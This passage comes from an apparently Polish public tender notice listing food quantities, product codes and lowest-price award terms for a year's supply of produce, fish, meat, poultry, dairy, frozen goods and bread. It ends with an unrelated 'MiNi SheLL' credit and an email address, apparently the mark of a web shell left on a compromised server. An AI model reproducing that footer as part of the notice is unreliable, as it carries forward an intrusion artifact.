Pietruszka korzeń	kg	500
Seler korzeń	kg	500
Buraki	kg	900
Kapusta biała	kg	1000
Kapusta czerwona	kg	500
Kapusta pekińska	kg	600
Pomidory	kg	250
Ogórek świeży                  	kg	500
Por   	kg	650
Kapusta kiszona	kg	950
Ogórek kiszony	kg	350
Jabłka	kg	600
Szczypior	pęczek	50
Sałata	szt	400
Papryka świeża  kolorowa	kg	250
Pieczarki	kg	300
Kalarepa świeża 	szt	100
Truskawki świeże	kg	100
Rzodkiew  biała	kg	100
Boćwina	pęczek	100
Kalafior  świeży	szt	50
Koper	pęczek	1200
Natka	pęczek	1000
Rzodkiewka 	pęczek	250
Brokuły  świeże	szt	100
Cukinia 	kg	40
Czosnek  świeży  polski	szt	200
Kapusta  włoska	szt	150
Fasola szparagowa  żółta	kg	50
Szczaw  świeży	pęczek	200
Fasolka  szparagowa  zielona	kg	50
Banany 	kg	300
Mandarynki 	kg	100
Sałata lodowa	szt	700
Cebula czerwona	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Filet z mintaja bez glazury SHP	kg	750
Filet z łososia	kg	30
Filet z dorsza  czarniaka bez glazury SHP	kg	250
Paluszki  rybne z fileta z mintaja  o zawartości mięsa rybiego co najmniej50%	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.90.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Kiełbasa podlaska wieprzowa 	kg	50
Wołowina zrazowa	kg	50
Antrykot wołowy	kg	40
Karkówka wieprzowa surowa b/k	kg	550
Szynka wieprzowa surowa b/k	kg	300
Kości wieprzowe z karkówki i schabu	kg	500
Kości wędzone	kg	250
Łopatka b/k	kg	1200
Schab  b/k	kg	650
Boczek  wędzony  bez żeberek	kg	50
Żeberka  świeże paski	kg	50
Boczek  świeży bez żeberek	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.17.00-2, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Drób, przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Kurczak świeży                   	kg	50
Filet z indyka	kg	100
Filet z kurczaka	kg	1000
Udka z kurczaka	kg	1000
Udo z indyka	kg	300
Szyje z indyka	kg	20
Skrzydła z indyka	kg	20
Porcje rosołowe	kg	800
Korpusy  z  indyka	kg	200
Kiełbasa drobiowa z fileta	kg	250
Kiełbasa śląska  z drobiu	kg	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.15.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Nabiał i przetwory nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Mleko  3,2%     karton       1l	szt	350
Śmietana 12%      0,5 l       	szt	1200
Śmietana 18%      1kg	szt	1400
Jogurt naturalny      3kg	szt	300
Maślanka     1l	szt	60
Jogurt  owocowy     125g	szt	2500
Masło ekstra     200g	szt	300
Margaryna  Kasia  250g  (lub równoważne)	szt	300
Twaróg     1 kg	kg	300
Ser żółty Gouda	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.55.10.00-5, 15.89.80.00-9, 15.53.00.00-2, 15.42.00.00-8, 15.54.00.00-5, 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Fasola szparagowa      2,5kg	kg	100
Kalafior    2,5kg	kg	100
Brokuły     2,5kg	kg	100
Truskawki    2,5kg	kg	50
Brukselka     2,5kg	kg	150
Mieszanka chińska    2,5kg	kg	100
Wiśnie bez pestek      2,5kg	kg	50
Śliwki bez pestek      2,5 kg	kg	50
Jagoda     2,5kg	kg	50
Bułki  drożdżowe na  parze      700g	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Chleb krojony pszenny   500g          	szt	650
Bułki  małe	szt	200
Chleb  razowy    700g	szt	450
Bułka  bagietka     300g	szt.	900
Pączki 	szt	360
Drożdżówki 	szt	360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com